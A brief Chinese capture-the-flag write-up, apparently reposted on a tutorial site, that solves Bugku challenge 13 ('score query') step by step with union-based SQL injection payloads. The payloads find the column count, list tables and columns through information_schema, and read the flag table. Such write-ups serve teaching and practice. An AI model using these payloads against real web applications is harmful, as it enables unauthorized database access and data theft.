Bugku-13.成绩查询-简单sql注入

本文主要是介绍Bugku-13.成绩查询-简单sql注入，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

判断注入点类型

1 显示

1' 不显示

2' and '1'='1 显示2的结果,单引号无括号

判断字段数

1' order by 5--+ 不显示

1' order by 4--+显示,字段数为4

判断可用字段

-1' union select 1,2,3,4--+

获取数据库

获取表名

id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='skctf'),3,4--+

获取字段名

id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='skctf' and table_name='fl4g'),3,4--+

获取flag

id=-1' union select 1,(select skctf_flag from fl4g),3,4--+

这篇关于Bugku-13.成绩查询-简单sql注入的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！